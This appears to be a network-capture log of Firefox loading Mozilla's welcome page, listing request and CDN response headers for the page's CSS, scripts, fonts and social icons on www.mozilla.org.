x-guploader-uploadid: AHmUCY1Lek5s62fiFdqHSkFyjmYLs_KQ_fHJ3FFqQ8nRu2tR_hmPqvM7fX-EEGuLhYN2Q-X9cwMbtQAKZw
server: UploadServer
expires: Mon, 04 Nov 2024 15:30:45 GMT
last-modified: Mon, 04 Nov 2024 10:29:41 GMT
etag: "b5b7c885f8fafa8b858e310952079003"
content-type: text/javascript
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 1782242
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400091-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 4, 3197
x-timer: S1736790040.586962,VS0,VE0
content-length: 1377
GET

https://www.mozilla.org/media/css/firefox_welcome_page19_to_24.3bad9ee2f487.css

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/css/firefox_welcome_page19_to_24.3bad9ee2f487.css HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/css,*/*;q=0.1
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: style
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1730716141244462
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 5172
x-goog-meta-goog-reserved-file-mtime: 1730716110
x-goog-hash: crc32c=DLs7pA==
x-goog-hash: md5=O62e4vSH6qlnotDzyeiM0w==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY25MoVBNiiLsRJHX4d6tWWol8wqxqLBXZyfB3epEFVMA6eg3BJvGTvzR-U6iS3m7_Ing8A
server: UploadServer
expires: Fri, 08 Nov 2024 17:05:50 GMT
last-modified: Thu, 07 Nov 2024 23:32:26 GMT
etag: "3bad9ee2f487eaa967a2d0f3c9e88cd3"
content-type: text/css
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 203697
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400024-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 5, 127
x-timer: S1736790040.586962,VS0,VE0
content-length: 5172
GET

https://www.mozilla.org/media/js/gtm-snippet.b5b7c885f8fa.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/gtm-snippet.b5b7c885f8fa.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1732278617594750
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 4030
x-goog-meta-goog-reserved-file-mtime: 1732278575
x-goog-hash: crc32c=2139kw==
x-goog-hash: md5=z+5Ao8028DVHdkyI+iygkg==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AFiumC7QcyszmDzoLKYanEhXjtIp9dJef2waB2PywRLvQysEcrV3nhDGdEK6ZYFdOsokWfam8jVttqHDXw
server: UploadServer
expires: Tue, 26 Nov 2024 01:45:43 GMT
last-modified: Mon, 25 Nov 2024 09:35:57 GMT
etag: "cfee40a3cd36f03547764c88fa2ca092"
content-type: text/css
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 570504
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300050-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 79, 142
x-timer: S1736790040.586437,VS0,VE0
content-length: 4030
GET

https://www.mozilla.org/media/img/logos/firefox/logo-word-hor.f3b18871b657.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/img/logos/firefox/logo-word-hor.f3b18871b657.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1730716169454808
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 12219
x-goog-meta-goog-reserved-file-mtime: 1730716108
x-goog-hash: crc32c=u+doZg==
x-goog-hash: md5=87GIcbZX6/sbDrvyY/zVKQ==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY2AjYUVvep3CiPW7pd6_AWZjJ1fZ9PLU-gpM9AopaoijT2arRrDEXFzP8jYNnrdsyaMchY
server: UploadServer
expires: Tue, 05 Nov 2024 16:24:55 GMT
last-modified: Mon, 04 Nov 2024 10:29:29 GMT
etag: "f3b18871b657ebfb1b0ebbf263fcd529"
content-type: image/svg+xml
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 479524
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400093-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 10, 2244
x-timer: S1736790040.587599,VS0,VE0
content-length: 12219
GET

https://www.mozilla.org/media/js/sentry.ca22623b11b1.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/sentry.ca22623b11b1.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-guploader-uploadid: AFIdbgQhjpkqwVHKV_mZQidIDiv1p6SmNsWGloCf8yZPXwEYxBPNzh2MvAacTNaddjfj501S
expires: Mon, 13 Jan 2025 15:07:08 GMT
last-modified: Mon, 13 Jan 2025 14:02:31 GMT
etag: "ca22623b11b10587e367017837790711"
x-goog-generation: 1736776951943546
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 55826
x-goog-meta-goog-reserved-file-mtime: 1736776839
content-type: text/javascript
x-goog-hash: crc32c=iDKTcA==
x-goog-hash: md5=yiJiOxGxBYfjZwF4N3kHEQ==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
server: UploadServer
content-encoding: br
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 12810
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300108-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 24, 429
x-timer: S1736790040.587732,VS0,VE0
vary: Accept-Encoding
content-length: 17901
GET

https://www.mozilla.org/media/js/lib.7cb1e204ce21.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/lib.7cb1e204ce21.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1730716181645098
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 17305
x-goog-meta-goog-reserved-file-mtime: 1730716110
x-goog-hash: crc32c=lR7rmw==
x-goog-hash: md5=fLHiBM4hqPvrEUegp0jEig==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY0-zS6HDdS0NDjbs0x12JFQCfiQHksSKDm4m392pWWtgeJG7NhbNCs0vHpmtk8tClk5PP2Qk6ZIUw
server: UploadServer
expires: Mon, 04 Nov 2024 15:48:47 GMT
last-modified: Mon, 04 Nov 2024 10:29:41 GMT
etag: "7cb1e204ce21a8fbeb1147a0a748c48a"
content-type: text/javascript
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 2371351
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400118-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 57, 4087
x-timer: S1736790040.588706,VS0,VE0
content-length: 17305
GET

https://www.mozilla.org/media/js/fxa.6cacc544775b.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/fxa.6cacc544775b.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 08 Nov 2024 17:45:39 GMT
last-modified: Thu, 07 Nov 2024 23:33:30 GMT
etag: "438fd3539700c54c0513d446b8124dbb"
x-goog-generation: 1731022410810439
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 5325
x-goog-meta-goog-reserved-file-mtime: 1731022303
content-type: text/javascript
x-goog-hash: crc32c=B2n5vA==
x-goog-hash: md5=Q4/TU5cAxUwFE9RGuBJNuw==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY0h3u4r8HHY56ctBe8UdlRZ-OykMdejGVOlSSa1gqY2R5Sk96hPeTqMo3-KI3yN59RntNY
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 1150456
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300069-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 3, 4055
x-timer: S1736790040.589120,VS0,VE0
content-length: 5325
GET

https://www.mozilla.org/media/js/data.438fd3539700.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/data.438fd3539700.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-guploader-uploadid: AFiumC46P8QHm_akq4GHb5PhA5zlJUfto4y_uoVOsEC1HHmuiK-osTIzjZh_7wFsxWw2GacSwgrBvxE
expires: Mon, 16 Dec 2024 19:59:45 GMT
last-modified: Mon, 16 Dec 2024 18:55:15 GMT
etag: "daf79f0fefd7be0f0f68aed173907bf5"
x-goog-generation: 1734375315265078
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 14624
x-goog-meta-goog-reserved-file-mtime: 1734375203
content-type: text/javascript
x-goog-hash: crc32c=biMa/Q==
x-goog-hash: md5=2vefD+/Xvg8PaK7Rc5B79Q==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 2414454
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300084-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 18, 4653
x-timer: S1736790040.589101,VS0,VE0
content-length: 14624
GET

https://www.mozilla.org/media/js/m24-ui.daf79f0fefd7.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/m24-ui.daf79f0fefd7.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1730716181386986
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7221
x-goog-meta-goog-reserved-file-mtime: 1730716110
x-goog-hash: crc32c=Y7tP8A==
x-goog-hash: md5=bKzFRHdbEzbNo1TvfgGK6w==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY0halAU52g2RwY0Jdy8qjxhS7j0aH1VmAhVGJL3fXE-DDpr-dxMX0G-U1NaAV4zIUVIrNM
server: UploadServer
expires: Mon, 04 Nov 2024 15:16:31 GMT
last-modified: Mon, 04 Nov 2024 10:29:41 GMT
etag: "6cacc544775b1336cda354ef7e018aeb"
content-type: text/javascript
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 1102533
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300093-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 11, 4056
x-timer: S1736790040.589627,VS0,VE0
content-length: 7221
GET

https://www.mozilla.org/media/js/glean.ff7106b49b39.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/glean.ff7106b49b39.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-guploader-uploadid: AFIdbgQv65VJO8aXv4BaXT87CtvQJjTapISqlqArJfJ6IQqBjYBbmEBFHx0o3pI6YNYXV_y9
expires: Mon, 13 Jan 2025 15:07:08 GMT
last-modified: Mon, 13 Jan 2025 14:02:29 GMT
etag: "ff7106b49b396ba7025f9d469b0d7851"
x-goog-generation: 1736776949652874
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 61345
x-goog-meta-goog-reserved-file-mtime: 1736776839
content-type: text/javascript
x-goog-hash: crc32c=Uhl8KQ==
x-goog-hash: md5=/3EGtJs5a6cCX51Gmw14UQ==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
server: UploadServer
content-encoding: br
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 12810
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400028-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 24, 425
x-timer: S1736790040.589615,VS0,VE0
vary: Accept-Encoding
content-length: 18877
GET

https://www.mozilla.org/media/js/firefox_welcome_page19_to_24.87e13c35e608.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/firefox_welcome_page19_to_24.87e13c35e608.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 08 Nov 2024 17:45:39 GMT
last-modified: Thu, 07 Nov 2024 23:33:30 GMT
etag: "f74bb4c07d16eb6f0550a1c79647c1d0"
x-goog-generation: 1731022410661045
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 5903
x-goog-meta-goog-reserved-file-mtime: 1731022303
content-type: text/javascript
x-goog-hash: crc32c=oq9ixQ==
x-goog-hash: md5=90u0wH0W628FUKHHlkfB0A==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY0_PNthlDkcfeABGk-i__Y3IX0oAjNmBRaMCxcoXZ3sWVLKo37ZrBSGCo2kMe3iGiwW8XE_bR37YA
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 2994014
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300103-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 3, 4085
x-timer: S1736790040.627471,VS0,VE0
content-length: 5903
GET

https://www.mozilla.org/media/js/consent-banner.f74bb4c07d16.js

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/js/consent-banner.f74bb4c07d16.js HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/en-US/firefox/welcome/21/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 08 Nov 2024 17:45:42 GMT
last-modified: Thu, 07 Nov 2024 23:33:32 GMT
etag: "87e13c35e608573c041d42795b4e2294"
x-goog-generation: 1731022412190558
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 265
x-goog-meta-goog-reserved-file-mtime: 1731022303
content-type: text/javascript
x-goog-hash: crc32c=A378Jg==
x-goog-hash: md5=h+E8NeYIVzwEHUJ5W04ilA==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY3RSHNi4y8xvIoYqWS-9bS99E5K7uhv18paMqN-R_8JQEXBN97i_9yrdmui9ae7UqZ_Ai3RSo9t0w
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 1774307
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300096-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 5, 132
x-timer: S1736790040.627501,VS0,VE0
content-length: 265
GET

https://www.mozilla.org/media/protocol/fonts/Inter-Bold.0564381b22b2.woff2

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/protocol/fonts/Inter-Bold.0564381b22b2.woff2 HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: identity
referer: https://www.mozilla.org/media/css/protocol-firefox.e581097aaf66.css
sec-fetch-dest: font
sec-fetch-mode: cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 08 Nov 2024 17:45:39 GMT
last-modified: Thu, 07 Nov 2024 23:33:35 GMT
etag: "0564381b22b2c4760eb15bef0691993a"
x-goog-generation: 1731022415418380
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 95928
x-goog-meta-goog-reserved-file-mtime: 1731022301
content-type: font/woff2
x-goog-hash: crc32c=5fNudw==
x-goog-hash: md5=BWQ4GyKyxHYOsVvvBpGZOg==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY3ZLagCi4RuM-l3V6GLofYowzO_CeyiWu_HfbDtfleff39inysRHH5-_5J4F_EsQ0imuX8
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 2384484
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300114-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 13, 2224
x-timer: S1736790040.865914,VS0,VE0
content-length: 95928
GET

https://www.mozilla.org/media/protocol/img/icons/social/x/white.7f50edd82090.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/protocol/img/icons/social/x/white.7f50edd82090.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1729175716402999
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 336
x-goog-meta-goog-reserved-file-mtime: 1729175608
x-goog-hash: crc32c=qQGVgQ==
x-goog-hash: md5=f1Dt2CCQvIdrG7PYQNBEsA==
x-goog-storage-class: STANDARD
x-guploader-uploadid: AHmUCY15Wxlka6vmQ0E25cYUqsKo6B9jFmY_GKANDGfTu85Fco149Zex4JU3tBZ17gMpVSgACDc
server: UploadServer
access-control-expose-headers: *
expires: Mon, 04 Nov 2024 15:28:37 GMT
last-modified: Mon, 04 Nov 2024 10:29:47 GMT
etag: "7f50edd82090bc876b1bb3d840d044b0"
content-type: image/svg+xml
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:39 GMT
age: 1771436
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400031-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 15, 3343
x-timer: S1736790040.949564,VS0,VE0
content-length: 336
GET

https://www.mozilla.org/media/protocol/img/icons/social/instagram/white.a7014a6150b3.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/protocol/img/icons/social/instagram/white.a7014a6150b3.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1730716187500003
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1509
x-goog-meta-goog-reserved-file-mtime: 1730716108
x-goog-hash: crc32c=NgPSCw==
x-goog-hash: md5=pwFKYVCz8VeyJWUKGpT4hQ==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY06dIFWRGFZx5ODIgZNoTHaU9SA2ZnIpn8IZCOHweHoMWQVSyf-5KYrJ-gV2KpcUCwUPFEoSTXuiA
server: UploadServer
expires: Mon, 04 Nov 2024 15:48:49 GMT
last-modified: Mon, 04 Nov 2024 10:29:47 GMT
etag: "a7014a6150b3f157b225650a1a94f885"
content-type: image/svg+xml
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1787565
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400031-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 34, 3341
x-timer: S1736790040.042606,VS0,VE0
content-length: 1509
GET

https://www.mozilla.org/media/protocol/img/icons/social/linkedin/white.cdc0e910cc1e.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/protocol/img/icons/social/linkedin/white.cdc0e910cc1e.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

expires: Fri, 08 Nov 2024 17:45:40 GMT
last-modified: Thu, 07 Nov 2024 23:33:41 GMT
etag: "cdc0e910cc1e8f7529c50c8cbb448da0"
x-goog-generation: 1731022421470105
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 528
x-goog-meta-goog-reserved-file-mtime: 1731022300
content-type: image/svg+xml
x-goog-hash: crc32c=ssNfMA==
x-goog-hash: md5=zcDpEMwej3UpxQyMu0SNoA==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY16ZvPi4e90XWWU4gvPNOmUUx43gGx9eMkRwi7oVHINnLpqVhJmjljQASzam6Rp0IK9s_lBOIPqnw
server: UploadServer
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1163097
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-krnt7300100-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 8, 3351
x-timer: S1736790040.155095,VS0,VE0
content-length: 528
GET

https://www.mozilla.org/media/protocol/img/icons/social/tiktok/white.599403de7ac0.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/protocol/img/icons/social/tiktok/white.599403de7ac0.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

x-goog-generation: 1730305430258618
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 688
x-goog-meta-goog-reserved-file-mtime: 1730305348
x-goog-hash: crc32c=0/PXBQ==
x-goog-hash: md5=WZQD3nrA/OgqNXVzUHbxAg==
x-goog-storage-class: STANDARD
access-control-expose-headers: *
x-guploader-uploadid: AHmUCY2pKsM0QESnhVY07cg9hBo6zhRTS0BBEkzjWxcX0ObwC9MZc-9HEJfV6XzVDF07kw1pPok
server: UploadServer
expires: Mon, 04 Nov 2024 15:02:20 GMT
last-modified: Mon, 04 Nov 2024 10:29:47 GMT
etag: "599403de7ac0fce82a3575735076f102"
content-type: image/svg+xml
via: 1.1 varnish, 1.1 varnish
cache-control: max-age=315360000, public, immutable
accept-ranges: bytes
date: Mon, 13 Jan 2025 17:40:40 GMT
age: 1760257
access-control-allow-origin: https://prod.cms.bedrock.prod.webservices.mozgcp.net
x-served-by: cache-bfi-kbfi7400118-BFI, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 16, 3350
x-timer: S1736790040.185712,VS0,VE0
content-length: 688
GET

https://www.mozilla.org/media/protocol/img/icons/social/spotify/white.aa5334e85bae.svg

firefox.exe

Remote address:

151.101.131.19:443

Request

GET /media/protocol/img/icons/social/spotify/white.aa5334e85bae.svg HTTP/2.0
host: www.mozilla.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css
sec-fetch-dest: image
sec-fetch-mode: no-cors
